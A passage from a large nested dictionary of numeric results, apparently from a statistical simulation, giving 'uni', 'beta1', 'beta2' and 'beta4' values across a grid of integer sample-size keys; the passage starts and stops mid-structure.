0.3433516617468062, 'beta4': [0.012041150326569453, 1.030658596755859]}, 100: {'uni': 0.11355909804218103, 'beta1': 0.016742564920940374, 'beta2': 0.4408459910322566, 'beta4': [0.01589543424873943, 1.0259719809454315]}, 75: {'uni': 0.1470273339563956, 'beta1': 0.04125038029241875, 'beta2': 0.45674725702545044, 'beta4': [0.022555544574912895, 1.0233327169256352]}, 50: {'uni': 0.20394668402714952, 'beta1': 0.05372064930491053, 'beta2': 0.5123425216124959, 'beta4': [0.0304452000024452, 1.0200138365664115]}, 30: {'uni': 0.29386982148971175, 'beta1': 0.11208120239277584, 'beta2': 0.566212490043836, 'beta4': [0.05037312077653552, 1.0162468129423625]}, 20: {'uni': 0.4163288316571464, 'beta1': 0.1957238486090897, 'beta2': 0.6485082504821236, 'beta4': [0.06315650633950089, 1.0124363037896646]}, 10: {'uni': 0.5941397773736758, 'beta1': 0.4652476209261588, 'beta2': 0.7793225324115746, 'beta4': [0.09474615964960159, 1.0118194733649668]}}, 500: {1000: {'uni': 0.02108754785696739, 'beta1': 0.000828450449946846, 'beta2': 0.23804932124856504, 'beta4': [0.003958299034384424, 1.0966419370784732]}, 750: {'uni': 0.0231126438648383, 'beta1': 0.0011984870212622199, 'beta2': 0.24394501858530787, 'beta4': [0.003959031038270082, 1.091515598515446]}, 500: {'uni': 0.022275983484612037, 'beta1': 0.0013732758438846776, 'beta2': 0.2388404713964999, 'beta4': [0.003877722834733257, 1.0768224445920325]}, 400: {'uni': 0.02715548978278476, 'beta1': 0.0014775685950695514, 'beta2': 0.2484098395121755, 'beta4': [0.004386814061610222, 1.0687088791174149]}, 300: {'uni': 0.04498460516730482, 'beta1': 0.003852979657961273, 'beta2': 0.28089547945046694, 'beta4': [0.006194097426606414, 1.0599273761126238]}, 200: {'uni': 0.060660963828962605, 'beta1': 0.005071898129623075, 'beta2': 0.3407020595992429, 'beta4': [0.008591729401854804, 1.0615248105680746]}, 150: {'uni': 0.08186611317553552, 'beta1': 0.009229562012829961, 'beta2': 0.3249653471688221, 'beta4': [0.011742812742923414, 1.0477046573914812]}, 100: {'uni': 0.14183665282462907, 'beta1': 0.02592201655783873, 'beta2': 0.4317014020935504, 'beta4': [0.017506491846792815, 1.0396479032970523]}, 75: {'uni': 0.13469268827271816, 'beta1': 0.03072455411464323, 'beta2': 0.40854305278610353, 'beta4': [0.023802069158570326, 1.0345503480689766]}, 50: {'uni': 0.2267326479955361, 'beta1': 0.06283204007090228, 'beta2': 0.47352253571629066, 'beta4': [0.03299971248019334, 1.0307427172444934]}, 30: {'uni': 0.30926013693933796, 'beta1': 0.12802403468984566, 'beta2': 0.5919033598519557, 'beta4': [0.0446428946566547, 1.024235192981656]}, 20: {'uni': 0.36495683958552094, 'beta1': 0.21502934587386965, 'beta2': 0.655814111969914, 'beta4': [0.0668219237466946, 1.0209794959351524]}, 10: {'uni': 0.5993358090672234, 'beta1': 0.41112679093508553, 'beta2': 0.7547878772085324, 'beta4': [0.09227814617364233, 1.0145010250500368]}}, 400: {1000: {'uni': 0.025896757785848847, 'beta1': 0.002275505689533187, 'beta2': 0.26906265954395275, 'beta4': [0.005316252950804182, 1.1053525286504498]}, 750: {'uni': 0.030999475873056417, 'beta1': 0.0013746739567481712, 'beta2': 0.24465392626230614, 'beta4': [0.005176818412544991, 1.1019675368471202]}, 500: {'uni': 0.025622811417340657, 'beta1': 0.0019022171807471847, 'beta2': 0.24729224167591998, 'beta4': [0.005578228859751129, 1.1013403509292035]}, 400: {'uni': 0.029561442343993004, 'beta1': 0.002048023106808748, 'beta2': 0.27637565566664013, 'beta4': [0.004998616282624286, 1.0859532939934569]}, 300: {'uni': 0.03571761814634283, 'beta1': 0.002437177583227123, 'beta2': 0.2700165589811169, 'beta4': [0.007821456553393443, 1.0785300663455835]}, 200: {'uni': 0.05477353463547685, 'beta1': 0.007157574589887143, 'beta2': 0.36000438163781423, 'beta4': [0.009477632290181273, 1.0679008578747287]}, 150: {'uni': 0.07637914396289984, 'beta1': 0.008214072491315897, 'beta2': 0.3313508914969982, 'beta4': [0.010896098343519681, 1.0606215920525077]}, 100: {'uni': 0.11381210686532531, 'beta1': 0.018398479440258932, 'beta2': 0.3848114060260855, 'beta4': [0.01842792204189153, 1.0494021227638108]}, 75: {'uni': 0.13235635536736093, 'beta1': 0.0400207536216299, 'beta2': 0.43622251050409433, 'beta4': [0.02096042420956011, 1.0417337524508474]}, 50: {'uni': 0.20784298399859202, 'beta1': 0.07130540772043548, 'beta2': 0.5172134773734999, 'beta4': [0.031019984250849474, 1.0399235220946341]}, 30: {'uni': 0.2806740167803171, 'beta1': 0.11704543446506291, 'beta2': 0.5702527726239361, 'beta4': [0.04554425947712502, 1.0308498609198327]}, 20: {'uni': 0.40246892267081, 'beta1': 0.20410446629412546, 'beta2': 0.6441518759507474, 'beta4': [0.05556042308335842, 1.0232480248410107]}, 10: {'uni': 0.598029613692239, 'beta1': 0.3829637206480797, 'beta2': 0.764251193581595, 'beta4': [0.09040730486062148, 1.019159751691838]}}, 300: {1000: {'uni': 0.03927216885312887, 'beta1': 0.0028801095098431964, 'beta2': 0.24947150687424588, 'beta4': [0.006471187793034744, 1.160842602904632]}, 750: {'uni': 0.04444164944164811, 'beta1': 0.002888622051822249, 'beta2': 0.2592722580304042, 'beta4': [0.006201130494927228, 1.1590062388205389]}, 500: {'uni': 0.03386451243834725, 'beta1': 0.0038221572392608933, 'beta2': 0.27658117256322334, 'beta4': [0.006739074173776894, 1.1233561596091521]}, 400: {'uni': 0.04800908765953219, 'beta1': 0.003065738369982432, 'beta2': 0.28548162501904323, 'beta4': [0.00606252876571075, 1.108126781417158]}, 300: {'uni': 0.05760353656127645, 'beta1': 0.003795886776418645, 'beta2': 0.2863528848787791, 'beta4': [0.006410206857481998, 1.1008081595374801]}, 200: {'uni': 0.05530565353026629, 'beta1': 0.007022220375979206, 'beta2': 0.3218109561131835, 'beta4': [0.008012846276247196, 1.0851800676090981]}, 150: {'uni': 0.1015884659040974, 'beta1': 0.010932465278433428, 'beta2': 0.346711515967189, 'beta4': [0.01438935035588938, 1.0772279067151915]}, 100: {'uni': 0.10066039964522674, 'beta1': 0.019599157825161983, 'beta2': 0.3976221533440906, 'beta4': [0.016667365195821262, 1.0619499723924766]}, 75: {'uni': 0.13815160891461617, 'beta1': 0.03502822760481833, 'beta2': 0.4383232053771871, 'beta4': [0.020620270083654274, 1.0613801533703469]}, 50: {'uni': 0.2066489219754158, 'beta1': 0.06567958756880526, 'beta2': 0.4952136429816835, 'beta4': [0.030838115238396878, 1.0494382597763074]}, 30: {'uni': 0.3439260948693291, 'beta1': 0.1260781571060967, 'beta2': 0.5639845179676323, 'beta4': [0.043988630038169885, 1.0379761722153382]}, 20: {'uni': 0.373632536240914, 'beta1': 0.198641104511171, 'beta2': 0.6452030053501869, 'beta4': [0.05742329072620164, 1.0343631164659426]}, 10: {'uni': 0.5786272688848213, 'beta1': 0.38699506401815836, 'beta2': 0.7654074587403914, 'beta4': [0.09447939575707047, 1.0225736679875932]}}, 200: {1000: {'uni': 0.06593180893978717, 'beta1': 0.004952441169426624, 'beta2': 0.32211181174186826, 'beta4': [0.009731394920594555, 1.2036434242302154]}, 750: {'uni': 0.050050536074611546, 'beta1': 0.006136627342269299, 'beta2': 0.41164072649474215, 'beta4': [0.008362211620772572, 1.2102293050053385]}, 500: {'uni': 0.05148222892421142, 'beta1': 0.0044901273914807575, 'beta2': 0.3278867264985391, 'beta4': [0.010669013908256336, 1.19341818888688]}, 400: {'uni': 0.05311457852860502, 'beta1': 0.006855300638757073, 'beta2': 0.3051136005232666, 'beta4': [0.008864068572306396, 1.1940907811101498]}, 300: {'uni': 0.058569513810713326, 'beta1': 0.006359938814453158, 'beta2': 0.3510907562210193, 'beta4': [0.01035722486111736, 1.1576432677671158]}, 200: {'uni': 0.07231911900208032, 'beta1': 0.009541107607029078, 'beta2': 0.3406432710228655, 'beta4': [0.009895950553842075, 1.134981886136477]}, 150: {'uni': 0.06879337077817359, 'beta1': 0.00908941619076127, 'beta2': 0.3562401517641972, 'beta4': [0.012642116783133737, 1.126631367592092]}, 100: {'uni': 0.09847445660132435, 'beta1': 0.023351167906981215, 'beta2': 0.3702057371167343, 'beta4': [0.020174892176101, 1.1035884364086865]}, 75: {'uni': 0.13842215822110243, 'beta1': 0.040074923811621865, 'beta2': 0.4016290449749483, 'beta4': [0.025368667272077594, 1.0816686828715776]}, 50: {'uni': 0.2319732833555621, 'beta1': 0.058682815020592964, 'beta2': 0.449773155245931, 'beta4': [0.02730342261673676, 1.072599635960804]}, 30: {'uni': 0.3101271727138763, 'beta1': 0.12657777631872538, 'beta2': 0.5474897963622241, 'beta4': [0.051145369772815974, 1.0623736422151917]}, 20: {'uni': 0.3961402044589855, 'beta1': 0.19850885747842734, 'beta2': 0.6186209195012662, 'beta4': [0.05940991818827158, 1.0513644617190916]}, 10: {'uni': 0.5757986824828967, 'beta1': 0.40423129685515935, 'beta2': 0.7505415142571369, 'beta4': [0.09379731922689409, 1.039165679271243]}}, 150: {1000: {'uni': 0.06409389658307825, 'beta1': 0.009910476131101938, 'beta2': 0.3806517369874718, 'beta4': [0.017842367687703767, 1.273216215005103]}, 750: {'uni': 0.07885955543671457, 'beta1': 0.013763072632693718, 'beta2': 0.3644659021625199, 'beta4': [0.011918256361555676, 1.2636715858729746]}, 500: {'uni': 0.0782362103749921, 'beta1': 0.011063387421172906, 'beta2': 0.3492767192933155, 'beta4': [0.015527147770540454, 1.2388524034789448]}, 400: {'uni': 0.08206814173951552, 'beta1': 0.0105477079679912, 'beta2': 0.36894084845731795, 'beta4': [0.014908702122614857, 1.212354152577374]}, 300: {'uni': 0.07712147055703845, 'beta1': 0.013570500873764199, 'beta2': 0.3886339629626576, 'beta4': [0.01257341645320956, 1.1948059873364203]}, 200: {'uni': 0.07403838281349277, 'beta1': 0.014174956292383793, 'beta2': 0.3950286524652677, 'beta4': [0.011937421306978668, 1.1777024261360427]}, 150: {'uni': 0.08411412518651155, 'beta1': 0.012028423896870248, 'beta2': 0.3818541442194885, 'beta4': [0.01208166846307851, 1.1514427861414884]}, 100: {'uni': 0.10466099788702969, 'beta1': 0.021407915808379432, 'beta2': 0.536739509831108, 'beta4': [0.016639317502525126, 1.1213359880442546]}, 75: {'uni': 0.1639590772562653, 'beta1': 0.029456618460635874, 'beta2': 0.4241204047591904, 'beta4': [0.020685089221907236, 1.1220699258280653]}, 50: {'uni': 0.21195935570350966, 'beta1': 0.050872484133304474, 'beta2': 0.48434321428634336, 'beta4': [0.03329067097448155, 1.1042086282877204]}, 30: {'uni': 0.30021647417605113, 'beta1': 0.1596029309488946, 'beta2': 0.5716372430031915, 'beta4': [0.0499410592964029, 1.0773251535218258]}, 20: {'uni': 0.3949077922550226, 'beta1': 0.2117560147178309, 'beta2': 0.6654963464294259, 'beta4': [0.06269582775240698, 1.0662881676425546]}, 10: {'uni': 0.5789591056497254, 'beta1': 0.42152167320469863, 'beta2': 0.7554936621338648, 'beta4': [0.09424799097838252, 1.0533803023202404]}}, 100: {1000: {'uni': 0.1194156470953036, 'beta1': 0.01975867033885883, 'beta2': 0.38041630466120363, 'beta4': [0.024152237250705463, 1.4090426779720273]}, 750: {'uni': 0.1339598298370513, 'beta1': 0.02312816824466994, 'beta2': 0.36885145013242054, 'beta4': [0.01982726902974318, 1.3708518857235923]}, 500: {'uni': 0.1035033245625255, 'beta1': 0.020732864110625814, 'beta2': 0.45503343746867975, 'beta4': [0.018104556463916902, 1.3457075667383138]}, 400: {'uni': 0.13886200283191671, 'beta1': 0.033658545561272284, 'beta2': 0.4492892269062327, 'beta4': [0.018812997051150655, 1.3133090999063297]}, 300: {'uni': 0.1081039869660674, 'beta1': 0.025748028713259506, 'beta2': 0.4804479970623521, 'beta4': [0.019440969752786388, 1.3645100349536026]}, 200: {'uni': 0.10834338931329811, 'beta1': 0.025134994582497336, 'beta2': 0.44719795518594385, 'beta4': [0.01985586858794121, 1.271297008277481]}, 150: {'uni': 0.10712222517002118, 'beta1': 0.022613877946775662, 'beta2': 0.47758394504359103, 'beta4': [0.019572061091874843, 1.2574112506220025]}, 100: {'uni': 0.1668102455464986, 'beta1': 0.028918170904344648, 'beta2': 0.5875385470461234, 'beta4': [0.01921321761305392, 1.2005469273434903]}, 75: {'uni': 0.14135594283467587, 'beta1': 0.0414053687092711, 'beta2': 0.447284407621719, 'beta4': [0.02519589264892086, 1.1702958014284723]}, 50: {'uni': 0.17825851499059536, 'beta1': 0.0602645575613488, 'beta2': 0.5425738075050448, 'beta4': [0.0318471605346179, 1.1527026666904288]}, 30: {'uni': 0.31553458317183447, 'beta1': 0.11288833543480611, 'beta2': 0.5420894350287434, 'beta4': [0.04618637746422554, 1.1126856866808228]}, 20: {'uni': 0.40279034362262994, 'beta1': 0.2014111707304979, 'beta2': 0.5994182473676781, 'beta4': [0.06368202517740608, 1.1083190253440836]}, 10: {'uni': 0.5758568363154362, 'beta1': 0.37794937111554805, 'beta2': 0.7414226913600013, 'beta4': [0.10749142038604542, 1.078648425767379]}}, 75: {1000: {'uni': 0.15198660481824744, 'beta1': 0.036008431318779996, 'beta2': 0.4722224787708969, 'beta4': [0.027516412068499897, 1.534216828529965]}, 750: {'uni': 0.17208264399948853, 'beta1': 0.03909264011281362, 'beta2': 0.6400645338590032, 'beta4': [0.02340077871735158, 1.4753355323679431]}, 500: {'uni': 0.1680012490284888, 'beta1': 0.05632032512882802, 'beta2': 0.5903766149915854, 'beta4': [0.020364313693572396, 1.4541567750184143]}, 400: {'uni': 0.143726941597115, 'beta1': 0.05071904581785537, 'beta2': 0.4303060292771255, 'beta4': [0.03295149694207187, 1.399313576809266]}, 300: {'uni': 0.18177622688584122, 'beta1': 0.047176957786292203, 'beta2': 0.5493492545653206, 'beta4': [0.022838896555165238, 1.3583642788350967]}, 200: {'uni': 0.15601957161470076, 'beta1': 0.036011709792265006, 'beta2': 0.5731923214795615, 'beta4': [0.025949998185882228, 1.378321286217048]}, 150: {'uni': 0.13257484917386256, 'beta1': 0.04822774386024882, 'beta2': 0.5831931502945309, 'beta4': [0.032781898025316815, 1.3687382603624914]}, 100: {'uni': 0.17722038629436307, 'beta1': 0.042694795909128086, 'beta2': 0.6029512404969393, 'beta4': [0.029877309146450395, 1.2681586706189192]}, 75: {'uni': 0.15891757845874932, 'beta1': 0.05355874965931141, 'beta2': 0.5300785911451448, 'beta4': [0.024918571880254658, 1.249215328218056]}, 50: {'uni': 0.18061682437151294, 'beta1': 0.05778453530955624, 'beta2': 0.5259465500991863, 'beta4': [0.02589140629920943, 1.1870268806723268]}, 30: {'uni': 0.2932284826916738, 'beta1': 0.12331237733161636, 'beta2': 0.5673856570268109, 'beta4': [0.044505647902749156, 1.155359943383599]}, 20: {'uni': 0.4521356971815503, 'beta1': 0.18953667103215918, 'beta2': 0.610039387320265, 'beta4': [0.0582975169999248, 1.1287493981989316]}, 10: {'uni': 0.5902047893457638, 'beta1': 0.399006287470108, 'beta2': 0.7279029685166025, 'beta4': [0.09005082946454858, 1.1274449949615486]}}, 50: {1000: {'uni': 0.2592076419350719, 'beta1': 0.08467191522733127, 'beta2': 0.734314769066797, 'beta4': [0.04213219735340979, 1.7222471762357856]}, 750: {'uni': 0.22167472117269596, 'beta1': 0.09540608751728515, 'beta2': 0.6421055730602457, 'beta4': [0.0504857786224193, 1.7019362614923808]}, 500: {'uni': 0.24531208210966063, 'beta1': 0.10627289268903653, 'beta2': 0.6456700227453712, 'beta4': [0.037069614011306415, 1.5187817437439013]}, 400: {'uni': 0.23695230367792885, 'beta1': 0.1002348842240865, 'beta2': 0.6049088807842221, 'beta4': [0.037868788524990434, 1.7812259821193235]}, 300: {'uni': 0.23115353035249844, 'beta1': 0.09531354298937929, 'beta2': 0.6911305993958063, 'beta4': [0.04299005884233124, 1.6010012435025673]}, 200: {'uni': 0.281525317673935, 'beta1': 0.09540124922896594, 'beta2': 0.6097339897307856, 'beta4': [0.037532176774296495, 1.6532632152046558]}, 150: {'uni': 0.22683249774663827, 'beta1': 0.08442270699935141, 'beta2': 0.7320138430968691, 'beta4': [0.03990371983864124, 1.4661997548716317]}, 100: {'uni': 0.2430263267539406, 'beta1': 0.10006392357305124, 'beta2': 0.7821900964967258, 'beta4': [0.03933639350774809, 1.391655290350789]}, 75: {'uni': 0.276189771579198, 'beta1': 0.0887640194455103, 'beta2': 0.6129637162484526, 'beta4': [0.03756894113400522, 1.390111322107257]}, 50: {'uni': 0.29778921217600474, 'beta1': 0.08612400831717622, 'beta2': 0.666981830661031, 'beta4': [0.031164853582807427, 1.3358991647553666]}, 30: {'uni': 0.2724782219999575, 'beta1': 0.13307131181798842, 'beta2': 0.6442109151591487, 'beta4': [0.04036794068199744, 1.2563196523679523]}, 20: {'uni': 0.41797425695598467, 'beta1': 0.1882874604106344, 'beta2': 0.7691372650156472, 'beta4': [0.059432531917173244, 1.2208571964471882]}, 10: {'uni': 0.5534689290667542, 'beta1': 0.4309100389659457, 'beta2': 0.7401015027587745, 'beta4': [0.09902687359586748, 1.1629411926124198]}}, 30: {1000: {'uni': 0.42071315434786194, 'beta1': 0.3029377220718273, 'beta2': 0.812141471651635, 'beta4': [0.06650330678120728, 2.020979343996272]}, 750: {'uni': 0.4519278080535244, 'beta1': 0.23297010287113198, 'beta2': 1.2570282718489256, 'beta4': [0.08856354984151762, 1.900675005693711]}, 500: {'uni': 0.490379074291211, 'beta1': 0.22164571894561366, 'beta2': 1.1513628955563604, 'beta4': [0.06173029516131422, 2.106609476056458]}, 400: {'uni': 0.39408498283423027, 'beta1': 0.264918129333582, 'beta2': 0.8840846910050425, 'beta4': [0.05283404446603562, 2.029681875929849]}, 300: {'uni': 0.5427138663027202, 'beta1': 0.2379881723996197, 'beta2': 0.8363520498569965, 'beta4': [0.06281976632758741, 1.986886804942407]}, 200: {'uni': 0.41057068188367307, 'beta1': 0.21827805543776632, 'beta2': 0.9448279749895979, 'beta4': [0.07380808667104646, 1.82960910894638]}, 150: {'uni': 0.4803138989403234, 'beta1': 0.2391926745124124, 'beta2': 0.7949557568023287, 'beta4': [0.06065292517095262, 1.9106220557945983]}, 100: {'uni': 0.384454764576367, 'beta1': 0.21463268237662367, 'beta2': 1.0750644448071933, 'beta4': [0.05395328522325796, 1.6868737907037483]}, 75: {'uni': 0.37686548308814144, 'beta1': 0.1803066791969128, 'beta2': 0.8135615889320663, 'beta4': [0.05869896393842299, 1.758756502053507]}, 50: {'uni': 0.43171434803060726, 'beta1': 0.2505599625779312, 'beta2': 1.0757749691129281, 'beta4': [0.05273825248231705, 1.5564961938411799]}, 30: {'uni': 0.51976331390363, 'beta1': 0.2137422259138964, 'beta2': 0.9685059088900959, 'beta4': [0.05537585694294487, 1.492573272428689]}, 20: {'uni': 0.4398832977629888, 'beta1': 0.2038338719891519, 'beta2': 0.9093408387748209, 'beta4': [0.06105880798359843, 1.4158958005586584]}, 10: {'uni': 0.602699561740835, 'beta1': 0.4091942418408925, 'beta2': 1.0985411109097716, 'beta4': [0.09013494857283567, 1.2751619916727241]}}, 20: {1000: {'uni': 0.8863415930595386, 'beta1': 0.4124138906473128, 'beta2': 1.488915214895412, 'beta4': [0.09369684930943876, 2.5300474929166104]}, 750: {'uni': 0.6761163081220196, 'beta1': 0.6112111176414844, 'beta2': 1.1574051144435042, 'beta4': [0.09350064236361985, 2.4233068456250466]}, 500: {'uni': 0.7326156383642906, 'beta1': 0.45488960268311474, 'beta2': 1.0667140010754592, 'beta4': [0.08539132003116143, 2.392318747646077]}, 400: {'uni': 0.9458240653327108, 'beta1': 0.5132179115834019, 'beta2': 1.1170018019059054, 'beta4': [0.09756400190793793, 2.383853429295003]}, 300: {'uni': 0.6953482539627818, 'beta1': 0.37005811426083546, 'beta2': 1.3395766294720786, 'beta4': [0.10236241919596632, 2.2424866381905315]}, 200: {'uni': 0.6752386657747762, 'beta1': 0.5629563163345486, 'beta2': 1.5090274583586125, 'beta4': [0.09418806419964053, 2.137879622888132]}, 150: {'uni': 0.6578393936141584, 'beta1': 0.40103058328304875, 'beta2': 1.486585761364853, 'beta4': [0.09597951072128233, 2.4974862138426848]}, 100: {'uni': 0.9223237716292768, 'beta1': 0.526962313037276, 'beta2': 1.3422875156501894, 'beta4': [0.11187693983427766, 2.390782201823441]}, 75: {'uni': 0.9378358647715992, 'beta1': 0.7320432373178699, 'beta2': 1.428360070177185, 'beta4': [0.08107123212486303, 1.9900453884534253]}, 50: {'uni': 0.5886779763529189, 'beta1': 0.7434142787005832, 'beta2': 1.490335833898308, 'beta4': [0.0867226219932577, 1.7708768543057836]}, 30: {'uni': 0.7844811065280236, 'beta1': 0.674585828881643, 'beta2': 1.3416765903993606, 'beta4': [0.10083853135007012, 1.8020388082207972]}, 20: {'uni': 0.6068962998473377, 'beta1': 0.5722158961739197, 'beta2': 1.5402314826280434, 'beta4': [0.09978682190916095, 1.6786815060076368]}, 10: {'uni': 0.6137740105070696, 'beta1': 0.6013842817208861, 'beta2': 1.4032123539466417, 'beta4': [0.09596686888019154, 1.4364997057965616]}}, 10: {1000: {'uni': 2.5487977734820326, 'beta1': 3.093835089134801, 'beta2': 2.628311382488589, 'beta4': [0.17203346857254662, 4.565292216563792]}, 750: {'uni': 1.7304439175235797, 'beta1': 3.4056157251335355, 'beta2': 2.880595484342148, 'beta4': [0.166405967714536, 4.699029049816299]}, 500: {'uni': 2.3351084717688373, 'beta1': 4.452247264467255, 'beta2': 2.6188955235283458, 'beta4': [0.20056108653416985, 4.087275033325601]}, 400: {'uni': 2.731195017919183, 'beta1': 2.350880124717626, 'beta2': 2.856370147812412, 'beta4': [0.16295115167167193, 4.24552877727418]}, 300: {'uni': 2.6641281409091975, 'beta1': 2.1576795517926084, 'beta2': 2.5130859559443004, 'beta4': [0.16779978199870219, 3.868571825041176]}, 200: {'uni': 1.5900925503183005, 'beta1': 3.1409755807227073, 'beta2': 2.2138809993371926, 'beta4': [0.1593318444045239, 4.790452032349865]}, 150: {'uni': 1.6286417760707215, 'beta1': 2.75377845626076, 'beta2': 3.67929821312175, 'beta4': [0.17531673356231803, 4.449312838541493]}, 100: {'uni': 1.8811969967887474, 'beta1': 2.9356208183819876, 'beta2': 2.473884077752684, 'beta4': [0.1709344371346987, 3.647827690030222]}, 75: {'uni': 1.8560795641118366, 'beta1': 3.1515350543410756, 'beta2': 3.0880468571889907, 'beta4': [0.15535292216279414, 4.064998701862136]}, 50: {'uni': 1.8814827053991783, 'beta1': 2.374493146782945, 'beta2': 3.008522859298132, 'beta4': [0.18437354728017072, 3.38720140624215]}, 30: {'uni': 1.48455109714551, 'beta1': 1.9410442694643812, 'beta2': 2.623047438090551, 'beta4': [0.14962804639542013, 2.944732475701521]}, 20: {'uni': 2.2606118912147144, 'beta1': 2.857453424374173, 'beta2': 2.6002878870531627, 'beta4': [0.16364368010741698, 3.0232270039247746]}, 10: {'uni': 2.0419910091282496, 'beta1': 2.278659514136714, 'beta2': 4.444036437620339, 'beta4': [0.1414900750503085, 2.359580377512841]}}}, 0.25: {1000: {1000: {'uni': 0.013195418550431052, 'beta1': 0.00033599202159974306, 'beta2': 0.17875776570990679, 'beta4': [0.001842483224513699, 1.0501146695568533]}, 750: {'uni': 0.016013552511175373, 'beta1': 0.0007448601839703062, 'beta2': 0.1939607247455362, 'beta4': [0.0026832198909584985, 1.045851171150504]}, 500: {'uni': 0.028606084800545467, 'beta1': 0.0009990776069765802, 'beta2': 0.23019643865863643, 'beta4': [0.0039038637470758205, 1.0408378665938753]}, 400: {'uni': 0.026784771828518836, 'beta1': 0.0017503690452189602, 'beta2': 0.23880661743287537, 'beta4': [0.0044638088057132085, 1.0339823686261234]}, 300: {'uni': 0.044901759577933735, 'beta1': 0.003137529397079459, 'beta2': 0.28413102290789566, 'beta4': [0.00570921365480773, 1.0296508775897812]}, 200: {'uni': 0.06082540361236728, 'beta1': 0.0063974879798100875, 'beta2': 0.30606916955325597, 'beta4': [0.008520697454289822, 1.0269966675849775]}, 150: {'uni': 0.07655707515610163, 'beta1': 0.013948369547467494, 'beta2': 0.33861090522030257, 'beta4': [0.011996336066692004, 1.0232867029647827]}, 100: {'uni': 0.10338298270717705, 'beta1': 0.018877705317333838, 'beta2': 0.45060055459442544, 'beta4': [0.022990283509798048, 1.0179700562252552]}, 75: {'uni': 0.1396659034571349, 'beta1': 0.03581049481895991, 'beta2': 0.4434539695729213, 'beta4': [0.020437099800626753, 1.0153667391680519]}, 50: {'uni': 0.19106507905911785, 'beta1': 0.06485537073911667, 'beta2': 0.4863070473264254, 'beta4': [0.03218176626342667, 1.0137839199153011]}, 30: {'uni': 0.3267417047168397, 'beta1': 0.11404304917468981, 'beta2': 0.588828283618436, 'beta4': [0.04423747548783673, 1.0114786486125193]}, 20: {'uni': 0.38420849857792005, 'beta1': 0.193594506472965, 'beta2': 0.6372453314564789, 'beta4': [0.06361050423708928, 1.0091615128119644]}, 10: {'uni': 0.5693675845737495, 'beta1': 0.39041102697990016, 'beta2': 0.7566315490210422, 'beta4': [0.09008771114132266, 1.0069189003128556]}}, 750: {1000: {'uni': 0.015017581623422201, 'beta1': 0.0005229969093151775, 'beta2': 0.2203058886730741, 'beta4': [0.00279784709123115, 1.064456900017356]}, 750: {'uni': 0.016904201481230167, 'beta1': 0.0005338291902363273, 'beta2': 0.19340880740923883, 'beta4': [0.00261926497056331, 1.0579321298839985]}, 500: {'uni': 0.027943172620408567, 'beta1': 0.0015318638527157646, 'beta2': 0.25409206714489535, 'beta4': [0.003575838793613114, 1.0492278279222302]}, 400: {'uni': 0.03118864795904444, 'beta1': 0.0016085289162773252, 'beta2': 0.24158631574832493, 'beta4': [0.004570704595623831, 1.043307593616712]}, 300: {'uni': 0.03939923254929314, 'beta1': 0.002394440069879624, 'beta2': 0.27881013797398596, 'beta4': [0.008032996377590652, 1.0410106273195696]}, 200: {'uni': 0.051906798122560396, 'beta1': 0.006278530092671409, 'beta2': 0.30644670823465214, 'beta4': [0.008433048809803174, 1.0336123797928127]}, 150: {'uni': 0.07326600862954896, 'beta1': 0.008905435316224583, 'beta2': 0.37113421026799154, 'beta4': [0.014546850850626635, 1.0289169977314274]}, 100: {'uni': 0.11189329019372281, 'beta1': 0.019846735456416045, 'beta2': 0.39542365294265347, 'beta4': [0.018208296987618746, 1.025766689306411]}, 75: {'uni': 0.1678484331707909, 'beta1': 0.029574402442326134, 'beta2': 0.42874417776423157, 'beta4': [0.02055972472321407, 1.0234873870502206]}, 50: {'uni': 0.1952271332661482, 'beta1': 0.05132180284455529, 'beta2': 0.5101942514065345, 'beta4': [0.029538584572671573, 1.0205709311816702]}, 30: {'uni': 0.29549103341642446, 'beta1': 0.11375382235525358, 'beta2': 0.5774010134797688, 'beta4': [0.043397134001584924, 1.0149572928091315]}, 20: {'uni': 0.369054813439251, 'beta1': 0.18753690050721722, 'beta2': 0.6302442146655091, 'beta4': [0.05905591166068328, 1.0127070855268694]}, 10: {'uni': 0.5705723645153031, 'beta1': 0.33538869001095784, 'beta2': 0.7536693315538421, 'beta4': [0.09090966706285687, 1.0096300679209578]}}, 500: {1000: {'uni': 0.021889557244944267, 'beta1': 0.0016084377298841322, 'beta2': 0.22093243033409488, 'beta4': [0.0044242546343159885, 1.0942706517572218]}, 750: {'uni': 0.0282779819663743, 'beta1': 0.0010063238278199597, 'beta2': 0.22801622968391058, 'beta4': [0.003524960547103637, 1.0847550545283853]}, 500: {'uni': 0.02396940909943071, 'beta1': 0.0012467850959314592, 'beta2': 0.2403896865764518, 'beta4': [0.004622510648582559, 1.078998095038962]}, 400: {'uni': 0.029529299989594714, 'beta1': 0.0012555606744509623, 'beta2': 0.26866034442080555, 'beta4': [0.004369392231828045, 1.0635484692436274]}, 300: {'uni': 0.03991254665867394, 'beta1': 0.00255822522826619, 'beta2': 0.2642231017828307, 'beta4': [0.005987976762930624, 1.0603589784153802]}, 200: {'uni': 0.06061810982823111, 'beta1': 0.004931950447678618, 'beta2': 0.3192877286208291, 'beta4': [0.00779126287388132, 1.047823237900618]}, 150: {'uni': 0.08309549670478669, 'beta1': 0.00964244354795674, 'beta2': 0.34286215766481964, 'beta4': [0.01441652340985287, 1.0466346852282493]}, 100: {'uni': 0.10587341186654257, 'beta1': 0.01978694887441401, 'beta2': 0.39279220465296005, 'beta4': [0.018506230081135853, 1.0370421759695896]}, 75: {'uni': 0.13396967983613503, 'beta1': 0.028619271263970607, 'beta2': 0.4432603614897364, 'beta4': [0.027804200013461133, 1.0299777798090028]}, 50: {'uni': 0.21077312314667257, 'beta1': 0.05886988860232499, 'beta2': 0.46155116123085194, 'beta4': [0.03078387179932803, 1.0289576178335533]}, 30: {'uni': 0.3131438067304429, 'beta1': 0.11687966328016658, 'beta2': 0.5663680930743225, 'beta4': [0.04808898498893729, 1.0239674123992182]}, 20: {'uni': 0.3569885336276907, 'beta1': 0.1869604203182388, 'beta2': 0.5988532407417108, 'beta4': [0.05835834115870568, 1.0204858684172466]}, 10: {'uni': 0.5803490099111785, 'beta1': 0.36069945606514914, 'beta2': 0.7395010191228991, 'beta4': [0.08620087384471821, 1.013087530204457]}}, 400: {1000: {'uni': 0.026575918392955672, 'beta1': 0.002392815941304911, 'beta2': 0.24456541440243038, 'beta4': [0.004797919837938112, 1.1253811146360175]}, 750: {'uni': 0.02644965057420995, 'beta1': 0.002199022745448091, 'beta2': 0.24959821674028976, 'beta4': [0.004905034300258548, 1.104013219668593]}, 500: {'uni': 0.02959411665644158, 'beta1': 0.0016885572723923717, 'beta2': 0.24898911593101478, 'beta4': [0.004745438922447355, 1.088997665442233]}, 400: {'uni': 0.03502641320504352, 'beta1': 0.0016786943439029485, 'beta2': 0.2621921403404168, 'beta4': 